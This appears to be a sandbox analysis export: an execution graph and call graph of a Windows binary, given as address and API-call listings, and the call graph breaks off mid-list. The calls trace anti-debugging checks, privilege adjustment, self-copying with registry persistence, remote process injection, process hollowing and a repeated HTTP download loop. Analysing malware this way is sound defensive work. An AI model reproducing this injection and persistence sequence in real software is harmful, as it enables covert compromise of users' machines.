                                                                                                                                                                                                  execution_graph 837 7ff6fdb5345c 897 7ff6fdb510a0 837->897 842 7ff6fdb5347c 1131 7ff6fdb54264 GetCurrentProcess OpenProcessToken 842->1131 843 7ff6fdb53474 ExitProcess 847 7ff6fdb53497 848 7ff6fdb534fb 847->848 849 7ff6fdb534ac 847->849 852 7ff6fdb5354c 848->852 853 7ff6fdb53510 848->853 850 7ff6fdb543a4 3 API calls 849->850 851 7ff6fdb534b8 850->851 854 7ff6fdb534d2 ExitProcess 851->854 855 7ff6fdb534bf 851->855 863 7ff6fdb535a2 852->863 864 7ff6fdb53561 852->864 856 7ff6fdb543a4 3 API calls 853->856 857 7ff6fdb543a4 3 API calls 855->857 858 7ff6fdb5351c 856->858 859 7ff6fdb534cb 857->859 860 7ff6fdb5352b 858->860 861 7ff6fdb53523 ExitProcess 858->861 859->854 862 7ff6fdb534da 859->862 1159 7ff6fdb5327c 860->1159 1150 7ff6fdb532ec 862->1150 1164 7ff6fdb53a74 863->1164 1146 7ff6fdb543a4 CreateMutexExA 864->1146 870 7ff6fdb53530 875 7ff6fdb53537 Sleep 870->875 876 7ff6fdb53544 ExitProcess 870->876 872 7ff6fdb534df 878 7ff6fdb534e6 Sleep 872->878 879 7ff6fdb534f3 ExitProcess 872->879 873 7ff6fdb5357c 880 7ff6fdb5327c 20 API calls 873->880 874 7ff6fdb53574 ExitProcess 875->870 878->872 882 7ff6fdb53581 880->882 885 7ff6fdb53588 Sleep 882->885 886 7ff6fdb53595 ExitProcess 882->886 883 7ff6fdb535ba 887 7ff6fdb543a4 3 API calls 883->887 884 7ff6fdb5360e 7 API calls 885->882 888 7ff6fdb535c6 887->888 889 7ff6fdb535e0 ExitProcess 888->889 890 7ff6fdb543a4 3 API calls 888->890 891 7ff6fdb535d9 890->891 891->889 892 7ff6fdb535e8 891->892 893 7ff6fdb532ec 47 API calls 892->893 894 7ff6fdb535ed 893->894 895 7ff6fdb535f4 Sleep 894->895 896 7ff6fdb53601 ExitProcess 894->896 895->894 1174 7ff6fdb51000 LoadLibraryA GetProcAddress 897->1174 899 7ff6fdb5113a 1175 7ff6fdb51000 LoadLibraryA GetProcAddress 899->1175 901 7ff6fdb51154 1176 7ff6fdb51050 LoadLibraryA GetProcAddress 901->1176 903 7ff6fdb5116e 1177 7ff6fdb51050 LoadLibraryA GetProcAddress 903->1177 905 7ff6fdb51188 1178 7ff6fdb51050 LoadLibraryA GetProcAddress 905->1178 907 7ff6fdb511a2 1179 7ff6fdb51050 LoadLibraryA GetProcAddress 907->1179 909 7ff6fdb511bc 1180 7ff6fdb51050 LoadLibraryA GetProcAddress 909->1180 911 7ff6fdb511d6 1181 7ff6fdb51050 LoadLibraryA GetProcAddress 911->1181 913 7ff6fdb511f0 1182 7ff6fdb51050 LoadLibraryA GetProcAddress 913->1182 915 7ff6fdb5120a 1183 7ff6fdb51050 LoadLibraryA GetProcAddress 915->1183 917 7ff6fdb51224 1184 7ff6fdb51050 LoadLibraryA GetProcAddress 917->1184 919 7ff6fdb5123e 1185 7ff6fdb51000 LoadLibraryA GetProcAddress 919->1185 921 7ff6fdb51258 1186 7ff6fdb51000 LoadLibraryA GetProcAddress 921->1186 923 7ff6fdb51272 1187 7ff6fdb51000 LoadLibraryA GetProcAddress 923->1187 925 7ff6fdb5128c 1188 7ff6fdb51000 LoadLibraryA GetProcAddress 925->1188 927 7ff6fdb512a6 1189 7ff6fdb51050 LoadLibraryA GetProcAddress 927->1189 929 7ff6fdb512c0 1190 7ff6fdb51050 LoadLibraryA GetProcAddress 929->1190 931 7ff6fdb512da 1191 7ff6fdb51050 LoadLibraryA GetProcAddress 931->1191 933 7ff6fdb512f4 1192 7ff6fdb51050 LoadLibraryA GetProcAddress 933->1192 935 7ff6fdb5130e 1193 7ff6fdb51050 LoadLibraryA GetProcAddress 935->1193 937 7ff6fdb51328 1194 7ff6fdb51050 LoadLibraryA GetProcAddress 937->1194 939 7ff6fdb51342 1195 7ff6fdb51050 LoadLibraryA GetProcAddress 939->1195 941 7ff6fdb5135c 1196 7ff6fdb51050 LoadLibraryA GetProcAddress 941->1196 943 7ff6fdb51376 1197 7ff6fdb51050 LoadLibraryA GetProcAddress 943->1197 945 7ff6fdb51390 1198 7ff6fdb51050 LoadLibraryA GetProcAddress 945->1198 947 7ff6fdb513aa 1199 7ff6fdb51050 LoadLibraryA GetProcAddress 947->1199 949 7ff6fdb513c4 1200 7ff6fdb51050 LoadLibraryA GetProcAddress 949->1200 951 7ff6fdb513de 1201 7ff6fdb51050 LoadLibraryA GetProcAddress 951->1201 953 7ff6fdb513f8 1202 7ff6fdb51050 LoadLibraryA GetProcAddress 953->1202 955 7ff6fdb51412 1203 7ff6fdb51050 LoadLibraryA GetProcAddress 955->1203 957 7ff6fdb5142c 1204 7ff6fdb51050 LoadLibraryA GetProcAddress 957->1204 959 7ff6fdb51446 1205 7ff6fdb51050 LoadLibraryA GetProcAddress 959->1205 961 7ff6fdb51460 1206 7ff6fdb51050 LoadLibraryA GetProcAddress 961->1206 963 7ff6fdb5147a 1207 7ff6fdb51050 LoadLibraryA GetProcAddress 963->1207 965 7ff6fdb51494 1208 7ff6fdb51050 LoadLibraryA GetProcAddress 965->1208 967 7ff6fdb514ae 1209 7ff6fdb51050 LoadLibraryA GetProcAddress 967->1209 969 7ff6fdb514c8 1210 7ff6fdb51050 LoadLibraryA GetProcAddress 969->1210 971 7ff6fdb514e2 1211 7ff6fdb51050 LoadLibraryA GetProcAddress 971->1211 973 7ff6fdb514fc 1212 7ff6fdb51050 LoadLibraryA GetProcAddress 973->1212 975 7ff6fdb51516 1213 7ff6fdb51050 LoadLibraryA GetProcAddress 975->1213 977 7ff6fdb51530 1214 7ff6fdb51050 LoadLibraryA GetProcAddress 977->1214 979 7ff6fdb5154a 1215 7ff6fdb51050 LoadLibraryA GetProcAddress 979->1215 981 7ff6fdb51564 1216 7ff6fdb51050 LoadLibraryA GetProcAddress 981->1216 983 7ff6fdb5157e 1217 7ff6fdb51050 LoadLibraryA GetProcAddress 983->1217 985 7ff6fdb51598 1218 7ff6fdb51050 LoadLibraryA GetProcAddress 985->1218 987 7ff6fdb515b2 1219 7ff6fdb51050 LoadLibraryA GetProcAddress 987->1219 989 7ff6fdb515cc 1220 7ff6fdb51050 LoadLibraryA GetProcAddress 989->1220 991 7ff6fdb515e6 1221 7ff6fdb51050 LoadLibraryA GetProcAddress 991->1221 993 7ff6fdb51600 1222 7ff6fdb51050 LoadLibraryA GetProcAddress 993->1222 995 7ff6fdb5161a 1223 7ff6fdb51050 LoadLibraryA GetProcAddress 995->1223 997 7ff6fdb51634 1224 7ff6fdb51050 LoadLibraryA GetProcAddress 997->1224 999 7ff6fdb5164e 1225 7ff6fdb51050 LoadLibraryA GetProcAddress 999->1225 1001 7ff6fdb51668 1226 7ff6fdb51050 LoadLibraryA GetProcAddress 1001->1226 1003 7ff6fdb51682 1227 7ff6fdb51050 LoadLibraryA GetProcAddress 1003->1227 1005 7ff6fdb5169c 1228 7ff6fdb51050 LoadLibraryA GetProcAddress 1005->1228 1007 7ff6fdb516b6 1229 7ff6fdb51050 LoadLibraryA GetProcAddress 1007->1229 1009 7ff6fdb516d0 1230 7ff6fdb51050 LoadLibraryA GetProcAddress 1009->1230 1011 7ff6fdb516ea 1231 7ff6fdb51050 LoadLibraryA GetProcAddress 1011->1231 1013 7ff6fdb51704 1232 7ff6fdb51050 LoadLibraryA GetProcAddress 1013->1232 1015 7ff6fdb5171e 1233 7ff6fdb51050 LoadLibraryA GetProcAddress 1015->1233 1017 7ff6fdb51738 1234 7ff6fdb51050 LoadLibraryA GetProcAddress 1017->1234 1019 7ff6fdb51752 1235 7ff6fdb51050 LoadLibraryA GetProcAddress 1019->1235 1021 7ff6fdb5176c 1236 7ff6fdb51050 LoadLibraryA GetProcAddress 1021->1236 1023 7ff6fdb51786 1237 7ff6fdb51050 LoadLibraryA GetProcAddress 1023->1237 1025 7ff6fdb517a0 1238 7ff6fdb51050 LoadLibraryA GetProcAddress 1025->1238 1027 7ff6fdb517ba 1239 7ff6fdb51050 LoadLibraryA GetProcAddress 1027->1239 1029 7ff6fdb517d4 1240 7ff6fdb51050 LoadLibraryA GetProcAddress 1029->1240 1031 7ff6fdb517ee 1241 7ff6fdb51050 LoadLibraryA GetProcAddress 1031->1241 1033 7ff6fdb51808 1242 7ff6fdb51050 LoadLibraryA GetProcAddress 1033->1242 1035 7ff6fdb51822 1243 7ff6fdb51050 LoadLibraryA GetProcAddress 1035->1243 1037 7ff6fdb5183c 1244 7ff6fdb51050 LoadLibraryA GetProcAddress 1037->1244 1039 7ff6fdb51856 1245 7ff6fdb51050 LoadLibraryA GetProcAddress 1039->1245 1041 7ff6fdb51870 1246 7ff6fdb51050 LoadLibraryA GetProcAddress 1041->1246 1043 7ff6fdb5188a 1247 7ff6fdb51050 LoadLibraryA GetProcAddress 1043->1247 1045 7ff6fdb518a4 1248 7ff6fdb51050 LoadLibraryA GetProcAddress 1045->1248 1047 7ff6fdb518be 1249 7ff6fdb51050 LoadLibraryA GetProcAddress 1047->1249 1049 7ff6fdb518d8 1250 7ff6fdb51050 LoadLibraryA GetProcAddress 1049->1250 1051 7ff6fdb518f2 1251 7ff6fdb51050 LoadLibraryA GetProcAddress 1051->1251 1053 7ff6fdb5190c 1252 7ff6fdb51050 LoadLibraryA GetProcAddress 1053->1252 1055 7ff6fdb51926 1253 7ff6fdb51050 LoadLibraryA GetProcAddress 1055->1253 1057 7ff6fdb51940 1254 7ff6fdb51050 LoadLibraryA GetProcAddress 1057->1254 1059 7ff6fdb5195a 1255 7ff6fdb51050 LoadLibraryA GetProcAddress 1059->1255 1061 7ff6fdb51974 1256 7ff6fdb51050 LoadLibraryA GetProcAddress 1061->1256 1063 7ff6fdb5198e 1257 7ff6fdb51050 LoadLibraryA GetProcAddress 1063->1257 1065 7ff6fdb519a8 1258 7ff6fdb51050 LoadLibraryA GetProcAddress 1065->1258 1067 7ff6fdb519c2 1259 7ff6fdb51050 LoadLibraryA GetProcAddress 1067->1259 1069 7ff6fdb519dc 1260 7ff6fdb51050 LoadLibraryA GetProcAddress 1069->1260 1071 7ff6fdb519f6 1261 7ff6fdb51050 LoadLibraryA GetProcAddress 1071->1261 1073 7ff6fdb51a10 1262 7ff6fdb51050 LoadLibraryA GetProcAddress 1073->1262 1075 7ff6fdb51a2a 1263 7ff6fdb51050 LoadLibraryA GetProcAddress 1075->1263 1077 7ff6fdb51a44 1264 7ff6fdb51050 LoadLibraryA GetProcAddress 1077->1264 1079 7ff6fdb51a5e 1265 7ff6fdb51050 LoadLibraryA GetProcAddress 1079->1265 1081 7ff6fdb51a78 1266 7ff6fdb51050 LoadLibraryA GetProcAddress 1081->1266 1083 7ff6fdb51a92 1267 7ff6fdb51050 LoadLibraryA GetProcAddress 1083->1267 1085 7ff6fdb51aac 1268 7ff6fdb51050 LoadLibraryA GetProcAddress 1085->1268 1087 7ff6fdb51ac6 1269 7ff6fdb51050 LoadLibraryA GetProcAddress 1087->1269 1089 7ff6fdb51ae0 1270 7ff6fdb51050 LoadLibraryA GetProcAddress 1089->1270 1091 7ff6fdb51afa 1271 7ff6fdb51050 LoadLibraryA GetProcAddress 1091->1271 1093 7ff6fdb51b14 1272 7ff6fdb51050 LoadLibraryA GetProcAddress 1093->1272 1095 7ff6fdb51b2e 1273 7ff6fdb51000 LoadLibraryA GetProcAddress 1095->1273 1097 7ff6fdb51b48 1274 7ff6fdb51050 LoadLibraryA GetProcAddress 1097->1274 1099 7ff6fdb51b62 1275 7ff6fdb51050 LoadLibraryA GetProcAddress 1099->1275 1101 7ff6fdb51b7c 1276 7ff6fdb51050 LoadLibraryA GetProcAddress 1101->1276 1103 7ff6fdb51b96 1277 7ff6fdb51050 LoadLibraryA GetProcAddress 1103->1277 1105 7ff6fdb51bb0 1278 7ff6fdb51050 LoadLibraryA GetProcAddress 1105->1278 1107 7ff6fdb51bca 1279 7ff6fdb51050 LoadLibraryA GetProcAddress 1107->1279 1109 7ff6fdb51be4 1280 7ff6fdb51050 LoadLibraryA GetProcAddress 1109->1280 1111 7ff6fdb51bfe 1281 7ff6fdb51000 LoadLibraryA GetProcAddress 1111->1281 1113 7ff6fdb51c18 1282 7ff6fdb51000 LoadLibraryA GetProcAddress 1113->1282 1115 7ff6fdb51c32 1283 7ff6fdb51050 LoadLibraryA GetProcAddress 1115->1283 1117 7ff6fdb51c4c 1284 7ff6fdb51050 LoadLibraryA GetProcAddress 1117->1284 1119 7ff6fdb51c66 1285 7ff6fdb51050 LoadLibraryA GetProcAddress 1119->1285 1121 7ff6fdb51c80 1286 7ff6fdb51050 LoadLibraryA GetProcAddress 1121->1286 1123 7ff6fdb51c9a 1287 7ff6fdb51050 LoadLibraryA GetProcAddress 1123->1287 1125 7ff6fdb51cb4 1288 7ff6fdb51050 LoadLibraryA GetProcAddress 1125->1288 1127 7ff6fdb51cce 1128 7ff6fdb5321c IsDebuggerPresent 1127->1128 1129 7ff6fdb5322e GetCurrentProcess CheckRemoteDebuggerPresent 1128->1129 1130 7ff6fdb5322a 1128->1130 1129->1130 1130->842 1130->843 1132 7ff6fdb5428a GetTokenInformation 1131->1132 1133 7ff6fdb53481 1131->1133 1289 7ff6fdb53b54 VirtualAlloc 1132->1289 1142 7ff6fdb53ce4 GetModuleFileNameW 1133->1142 1135 7ff6fdb542bb GetTokenInformation 1136 7ff6fdb542e8 CloseHandle 1135->1136 1137 7ff6fdb54302 AdjustTokenPrivileges CloseHandle 1135->1137 1138 7ff6fdb53b24 VirtualFree 1136->1138 1290 7ff6fdb53b24 1137->1290 1139 7ff6fdb542fd 1138->1139 1139->1133 1143 7ff6fdb53dd2 wcsncpy 1142->1143 1144 7ff6fdb53d0f PathFindFileNameW wcslen 1142->1144 1145 7ff6fdb53d49 1143->1145 1144->1145 1145->847 1147 7ff6fdb5356d 1146->1147 1148 7ff6fdb543d0 GetLastError 1146->1148 1147->873 1147->874 1148->1147 1149 7ff6fdb543dd CloseHandle 1148->1149 1149->1147 1293 7ff6fdb538c4 1150->1293 1152 7ff6fdb532fd 1296 7ff6fdb546e4 CreateFileW 1152->1296 1154 7ff6fdb53315 1155 7ff6fdb53357 CreateThread 1154->1155 1308 7ff6fdb540c4 1154->1308 1155->872 1160 7ff6fdb538c4 11 API calls 1159->1160 1161 7ff6fdb5328c 1160->1161 1347 7ff6fdb544b4 CreateFileW 1161->1347 1165 7ff6fdb53744 3 API calls 1164->1165 1166 7ff6fdb53a9f 1165->1166 1167 7ff6fdb538c4 11 API calls 1166->1167 1168 7ff6fdb53aa9 GetModuleFileNameW DeleteFileW CopyFileW 1167->1168 1169 7ff6fdb53aeb SetFileAttributesW 1168->1169 1170 7ff6fdb535a7 1168->1170 1359 7ff6fdb539b4 RegOpenKeyExW 1169->1359 1172 7ff6fdb533ec GetVersionExW 1170->1172 1173 7ff6fdb5341d 1172->1173 1173->883 1173->884 1174->899 1175->901 1176->903 1177->905 1178->907 1179->909 1180->911 1181->913 1182->915 1183->917 1184->919 1185->921 1186->923 1187->925 1188->927 1189->929 1190->931 1191->933 1192->935 1193->937 1194->939 1195->941 1196->943 1197->945 1198->947 1199->949 1200->951 1201->953 1202->955 1203->957 1204->959 1205->961 1206->963 1207->965 1208->967 1209->969 1210->971 1211->973 1212->975 1213->977 1214->979 1215->981 1216->983 1217->985 1218->987 1219->989 1220->991 1221->993 1222->995 1223->997 1224->999 1225->1001 1226->1003 1227->1005 1228->1007 1229->1009 1230->1011 1231->1013 1232->1015 1233->1017 1234->1019 1235->1021 1236->1023 1237->1025 1238->1027 1239->1029 1240->1031 1241->1033 1242->1035 1243->1037 1244->1039 1245->1041 1246->1043 1247->1045 1248->1047 1249->1049 1250->1051 1251->1053 1252->1055 1253->1057 1254->1059 1255->1061 1256->1063 1257->1065 1258->1067 1259->1069 1260->1071 1261->1073 1262->1075 1263->1077 1264->1079 1265->1081 1266->1083 1267->1085 1268->1087 1269->1089 1270->1091 1271->1093 1272->1095 1273->1097 1274->1099 1275->1101 1276->1103 1277->1105 1278->1107 1279->1109 1280->1111 1281->1113 1282->1115 1283->1117 1284->1119 1285->1121 1286->1123 1287->1125 1288->1127 1289->1135 1291 7ff6fdb53b48 1290->1291 1292 7ff6fdb53b35 VirtualFree 1290->1292 1291->1133 1292->1291 1323 7ff6fdb53744 GetWindowsDirectoryW 1293->1323 1295 7ff6fdb538f3 8 API calls 1295->1152 1297 7ff6fdb54745 GetFileSize GetProcessHeap RtlAllocateHeap 1296->1297 1298 7ff6fdb5473e 1296->1298 1299 7ff6fdb5478e CloseHandle 1297->1299 1300 7ff6fdb547a0 ReadFile 1297->1300 1298->1154 1299->1298 1301 7ff6fdb547c7 GetProcessHeap HeapFree CloseHandle 1300->1301 1302 7ff6fdb547ef 1300->1302 1301->1298 1303 7ff6fdb54808 GetProcessHeap HeapFree CloseHandle 1302->1303 1305 7ff6fdb54830 1302->1305 1303->1298 1304 7ff6fdb5499b GetProcessHeap HeapFree CloseHandle 1304->1298 1305->1304 1306 7ff6fdb548eb GetProcessHeap RtlAllocateHeap 1305->1306 1307 7ff6fdb54934 1306->1307 1307->1304 1328 7ff6fdb54004 CreateToolhelp32Snapshot 1308->1328 1311 7ff6fdb540e4 1312 7ff6fdb5414b GetCurrentProcess OpenProcessToken 1311->1312 1313 7ff6fdb54168 LookupPrivilegeValueW 1312->1313 1314 7ff6fdb541c2 OpenProcess 1312->1314 1315 7ff6fdb541b7 CloseHandle 1313->1315 1316 7ff6fdb54190 AdjustTokenPrivileges 1313->1316 1318 7ff6fdb541ee 1314->1318 1321 7ff6fdb541e4 1314->1321 1315->1314 1316->1315 1318->1321 1322 7ff6fdb54222 WaitForSingleObject 1318->1322 1335 7ff6fdb52cb8 1318->1335 1319 7ff6fdb54244 CloseHandle 1320 7ff6fdb5424f 1319->1320 1320->1155 1321->1319 1321->1320 1322->1312 1322->1321 1324 7ff6fdb53798 GetVolumeInformationW 1323->1324 1325 7ff6fdb5378e 1323->1325 1326 7ff6fdb53814 1324->1326 1325->1324 1327 7ff6fdb5387e wsprintfW 1326->1327 1327->1295 1329 7ff6fdb53342 1328->1329 1330 7ff6fdb5403f Process32FirstW 1328->1330 1329->1311 1331 7ff6fdb54099 CloseHandle 1330->1331 1332 7ff6fdb5405e wcscmp 1330->1332 1331->1329 1333 7ff6fdb54082 Process32NextW 1332->1333 1334 7ff6fdb54075 1332->1334 1333->1331 1333->1332 1334->1331 1336 7ff6fdb52d0b 1335->1336 1337 7ff6fdb52d2b 1336->1337 1339 7ff6fdb52d4d VirtualAllocEx 1336->1339 1343 7ff6fdb52a88 1336->1343 1337->1318 1339->1337 1340 7ff6fdb52d87 WriteProcessMemory 1339->1340 1340->1337 1341 7ff6fdb52dd0 VirtualProtectEx 1340->1341 1341->1337 1342 7ff6fdb52e03 CreateRemoteThread 1341->1342 1342->1336 1342->1337 1344 7ff6fdb52b01 1343->1344 1345 7ff6fdb52c0a StrStrA 1344->1345 1346 7ff6fdb52b08 1344->1346 1345->1344 1345->1346 1346->1336 1348 7ff6fdb5450a 1347->1348 1349 7ff6fdb5452b GetLastError 1347->1349 1353 7ff6fdb54404 GetFileSize 1348->1353 1351 7ff6fdb5329f CreateThread Sleep 1349->1351 1351->870 1358 7ff6fdb53b54 VirtualAlloc 1353->1358 1355 7ff6fdb54430 1356 7ff6fdb5447a CloseHandle 1355->1356 1357 7ff6fdb54444 SetFilePointer ReadFile 1355->1357 1356->1351 1357->1356 1358->1355 1360 7ff6fdb539f9 RegSetValueExW RegCloseKey 1359->1360 1361 7ff6fdb539f5 1359->1361 1360->1361 1361->1170 1417 7ff6fdb52f9c 1418 7ff6fdb538c4 11 API calls 1417->1418 1419 7ff6fdb52fdb 1418->1419 1420 7ff6fdb546e4 17 API calls 1419->1420 1421 7ff6fdb52fff 1420->1421 1422 7ff6fdb540c4 5 API calls 1421->1422 1423 7ff6fdb53022 1422->1423 1424 7ff6fdb540e4 13 API calls 1423->1424 1425 7ff6fdb53037 GetProcessHeap HeapFree 1424->1425 1432 7ff6fdb51cdc 1433 7ff6fdb51d06 InternetOpenW 1432->1433 1434 7ff6fdb51d33 Sleep 1433->1434 1435 7ff6fdb51d40 InternetOpenUrlW 1433->1435 1434->1433 1436 7ff6fdb51d77 InternetOpenUrlW 1435->1436 1437 7ff6fdb51dc9 HttpQueryInfoA 1435->1437 1436->1437 1440 7ff6fdb51dae InternetCloseHandle Sleep 1436->1440 1438 7ff6fdb51df8 InternetCloseHandle InternetCloseHandle Sleep 1437->1438 1439 7ff6fdb51e1e 1437->1439 1438->1433 1441 7ff6fdb51e28 InternetCloseHandle InternetOpenUrlW 1439->1441 1442 7ff6fdb51e85 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1439->1442 1440->1433 1441->1442 1443 7ff6fdb51e6a InternetCloseHandle Sleep 1441->1443 1444 7ff6fdb51eea InternetCloseHandle InternetCloseHandle 1442->1444 1445 7ff6fdb51f04 1442->1445 1443->1433 1446 7ff6fdb51f83 1444->1446 1447 7ff6fdb51f0c InternetReadFile 1445->1447 1448 7ff6fdb51f5a InternetCloseHandle InternetCloseHandle 1445->1448 1447->1445 1447->1448 1448->1446 1449 7ff6fdb530dc 1452 7ff6fdb530e5 1449->1452 1450 7ff6fdb531d1 1452->1450 1454 7ff6fdb53c24 RegDeleteKeyW 1452->1454 1455 7ff6fdb53e24 9 API calls 1452->1455 1456 7ff6fdb539b4 3 API calls 1452->1456 1458 7ff6fdb545c4 CreateFileW 1452->1458 1463 7ff6fdb53b84 RegOpenKeyExW 1452->1463 1454->1452 1455->1452 1457 7ff6fdb531c1 Sleep 1456->1457 1457->1452 1459 7ff6fdb5465a 1458->1459 1460 7ff6fdb5461f 1458->1460 1459->1452 1466 7ff6fdb54544 SetFilePointer WriteFile SetEndOfFile 1460->1466 1462 7ff6fdb5463b SetFileAttributesW CloseHandle 1462->1459 1464 7ff6fdb53bd8 RegSetValueExW RegCloseKey 1463->1464 1465 7ff6fdb53c12 1463->1465 1464->1465 1465->1452 1466->1462 1362 7ff6fdb52f0c CreateMutexA 1363 7ff6fdb52f4e GetLastError 1362->1363 1364 7ff6fdb52f31 ReleaseMutex CloseHandle 1362->1364 1366 7ff6fdb52f5b ReleaseMutex CloseHandle 1363->1366 1367 7ff6fdb52f78 ReleaseMutex CloseHandle 1363->1367 1365 7ff6fdb52f90 1364->1365 1366->1365 1367->1365 1368 7ff6fdb5338c 1371 7ff6fdb52048 GetModuleFileNameW 1368->1371 1372 7ff6fdb520c9 1371->1372 1379 7ff6fdb520c4 1371->1379 1373 7ff6fdb5211d 1372->1373 1374 7ff6fdb52107 1372->1374 1414 7ff6fdb51f88 ExpandEnvironmentStringsW 1373->1414 1376 7ff6fdb5213b 1374->1376 1377 7ff6fdb52111 1374->1377 1415 7ff6fdb51fc8 ExpandEnvironmentStringsW 1376->1415 1377->1379 1416 7ff6fdb52008 ExpandEnvironmentStringsW 1377->1416 1380 7ff6fdb52132 1380->1379 1382 7ff6fdb5218d CreateProcessW 1380->1382 1382->1379 1383 7ff6fdb521e8 CreateFileW 1382->1383 1383->1379 1384 7ff6fdb5222f GetFileSize 1383->1384 1385 7ff6fdb5224d 1384->1385 1386 7ff6fdb52257 CloseHandle 1384->1386 1385->1386 1387 7ff6fdb52267 VirtualAlloc 1385->1387 1386->1379 1388 7ff6fdb522a1 ReadFile 1387->1388 1389 7ff6fdb52291 CloseHandle 1387->1389 1390 7ff6fdb522ce VirtualFree CloseHandle 1388->1390 1391 7ff6fdb522f1 CloseHandle GetThreadContext 1388->1391 1389->1379 1390->1379 1392 7ff6fdb52359 ReadProcessMemory GetModuleHandleA GetProcAddress 1391->1392 1393 7ff6fdb52341 VirtualFree 1391->1393 1394 7ff6fdb523dc 1392->1394 1393->1379 1395 7ff6fdb523f8 VirtualAllocEx 1394->1395 1396 7ff6fdb523e0 VirtualFree 1394->1396 1397 7ff6fdb5247b WriteProcessMemory 1395->1397 1398 7ff6fdb52463 VirtualFree 1395->1398 1396->1379 1399 7ff6fdb524b1 VirtualFree 1397->1399 1402 7ff6fdb524c9 1397->1402 1398->1379 1399->1379 1400 7ff6fdb524ff WriteProcessMemory 1401 7ff6fdb5258a VirtualFree 1400->1401 1400->1402 1401->1379 1402->1400 1407 7ff6fdb525a7 1402->1407 1403 7ff6fdb52898 WriteProcessMemory SetThreadContext 1405 7ff6fdb52933 ResumeThread 1403->1405 1406 7ff6fdb5291e VirtualFree 1403->1406 1404 7ff6fdb52619 RtlCompareMemory 1404->1407 1411 7ff6fdb5266c 1404->1411 1408 7ff6fdb5295a VirtualFree 1405->1408 1409 7ff6fdb52945 VirtualFree 1405->1409 1406->1379 1407->1403 1407->1404 1408->1379 1409->1379 1410 7ff6fdb52893 1410->1403 1411->1410 1412 7ff6fdb5279c ReadProcessMemory WriteProcessMemory 1411->1412 1412->1411 1413 7ff6fdb52871 VirtualFree 1412->1413 1413->1379 1414->1380 1415->1380 1416->1380 1426 7ff6fdb533ac 1427 7ff6fdb52048 36 API calls 1426->1427 1428 7ff6fdb533bf 1427->1428 1467 7ff6fdb531ec 1468 7ff6fdb531f5 1467->1468 1469 7ff6fdb5320e 1468->1469 1472 7ff6fdb5306c 1468->1472 1477 7ff6fdb52e6c CreateMutexA 1472->1477 1475 7ff6fdb530cc Sleep 1475->1468 1476 7ff6fdb53087 Sleep CreateThread WaitForSingleObject 1476->1475 1478 7ff6fdb52e98 ReleaseMutex CloseHandle 1477->1478 1479 7ff6fdb52eb5 GetLastError 1477->1479 1480 7ff6fdb52ef7 1478->1480 1481 7ff6fdb52ec2 ReleaseMutex CloseHandle 1479->1481 1482 7ff6fdb52edf ReleaseMutex CloseHandle 1479->1482 1480->1475 1480->1476 1481->1480 1482->1480

                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                  callgraph 0 Function_00007FF6FDB5ABFB 1 Function_00007FF6FDB536FC 2 Function_00007FF6FDB5ABF7 3 Function_00007FF6FDB5C2F7 4 Function_00007FF6FDB5ABF9 5 Function_00007FF6FDB5C2F9 6 Function_00007FF6FDB54004 7 Function_00007FF6FDB54404 84 Function_00007FF6FDB53B54 7->84 8 Function_00007FF6FDB5D904 9 Function_00007FF6FDB5C501 10 Function_00007FF6FDB51000 11 Function_00007FF6FDB52F0C 12 Function_00007FF6FDB52008 13 Function_00007FF6FDB53609 14 Function_00007FF6FDB5B508 15 Function_00007FF6FDB5E008 16 Function_00007FF6FDB5EC12 17 Function_00007FF6FDB53F14 18 Function_00007FF6FDB53714 19 Function_00007FF6FDB5D615 20 Function_00007FF6FDB5D915 21 Function_00007FF6FDB5C91A 22 Function_00007FF6FDB5321C 23 Function_00007FF6FDB5D91D 24 Function_00007FF6FDB53B24 25 Function_00007FF6FDB53C24 26 Function_00007FF6FDB53E24 27 Function_00007FF6FDB52CB8 64 Function_00007FF6FDB52A88 27->64 28 Function_00007FF6FDB5D8B8 29 Function_00007FF6FDB5DCC2 30 Function_00007FF6FDB545C4 79 Function_00007FF6FDB54544 30->79 31 Function_00007FF6FDB540C4 31->6 32 Function_00007FF6FDB538C4 78 Function_00007FF6FDB53744 32->78 33 Function_00007FF6FDB5D0C4 34 Function_00007FF6FDB5DEC1 35 Function_00007FF6FDB5C9CB 36 Function_00007FF6FDB5EFCA 37 Function_00007FF6FDB533CC 82 Function_00007FF6FDB52048 37->82 38 Function_00007FF6FDB51FC8 39 Function_00007FF6FDB5A2D0 40 Function_00007FF6FDB5B3DA 41 Function_00007FF6FDB51CDC 42 Function_00007FF6FDB530DC 42->25 42->26 42->30 60 Function_00007FF6FDB53B84 42->60 75 Function_00007FF6FDB539B4 42->75 43 Function_00007FF6FDB5A0DD 44 Function_00007FF6FDB546E4 108 Function_00007FF6FDB54674 44->108 45 Function_00007FF6FDB53CE4 46 Function_00007FF6FDB540E4 46->27 47 Function_00007FF6FDB533EC 48 Function_00007FF6FDB532EC 48->31 48->32 48->44 48->46 96 Function_00007FF6FDB53C64 48->96 49 Function_00007FF6FDB531EC 104 Function_00007FF6FDB5306C 49->104 50 Function_00007FF6FDB536EC 51 Function_00007FF6FDB5E8F3 52 Function_00007FF6FDB5ABF2 53 Function_00007FF6FDB5C2F5 54 Function_00007FF6FDB5B2F4 55 Function_00007FF6FDB5BCF1 56 Function_00007FF6FDB5327C 56->32 76 Function_00007FF6FDB544B4 56->76 57 Function_00007FF6FDB5A776 58 Function_00007FF6FDB52978 59 Function_00007FF6FDB5A778 61 Function_00007FF6FDB5A27F 62 Function_00007FF6FDB5A18A 63 Function_00007FF6FDB5338C 63->82 64->58 65 Function_00007FF6FDB51F88 66 Function_00007FF6FDB5E99B 67 Function_00007FF6FDB52F9C 67->31 67->32 67->44 67->46 67->96 68 Function_00007FF6FDB5359D 69 Function_00007FF6FDB5E997 70 Function_00007FF6FDB5E999 71 Function_00007FF6FDB543A4 72 Function_00007FF6FDB510A0 72->10 88 Function_00007FF6FDB51050 72->88 73 Function_00007FF6FDB533AC 73->82 74 Function_00007FF6FDB5BEAD 76->7 77 Function_00007FF6FDB5D339 78->18 80 Function_00007FF6FDB5D33F 81 Function_00007FF6FDB5DC46 82->12 82->38 82->65 83 Function_00007FF6FDB5A052 85 Function_00007FF6FDB5DC55 86 Function_00007FF6FDB5CD54 87 Function_00007FF6FDB5A04E 89 Function_00007FF6FDB5A05A 90 Function_00007FF6FDB5345C 90->17 90->22 90->45 90->47 90->48 90->56 90->71 90->72 95 Function_00007FF6FDB54264 90->95 107 